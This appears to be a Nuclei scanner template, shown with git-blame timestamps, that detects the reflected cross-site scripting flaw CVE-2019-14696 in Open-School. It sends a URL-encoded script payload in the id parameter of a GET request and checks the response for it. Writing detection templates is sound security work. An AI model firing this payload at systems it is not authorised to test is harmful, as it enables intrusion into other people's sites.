2021-01-02 04:59:06 +00:00
|
|
|
id: CVE-2019-14696
|
2020-09-04 15:46:07 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Open-Scool 3.0/Community Edition 2.3 - Cross Site Scripting
|
|
|
|
author: pikpikcu
|
2020-09-05 06:40:16 +00:00
|
|
|
severity: medium
|
2021-02-05 19:44:41 +00:00
|
|
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-14696
|
|
|
|
tags: cve,cve2019,xss
|
2020-09-04 15:46:07 +00:00
|
|
|
|
|
|
|
requests:
|
2020-09-17 09:58:51 +00:00
|
|
|
- method: GET
|
2020-09-04 15:46:07 +00:00
|
|
|
path:
|
2020-09-04 15:51:55 +00:00
|
|
|
- '{{BaseURL}}/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
2020-09-04 15:46:07 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- '<script>alert(document.domain)</script>'
|
|
|
|
part: body
|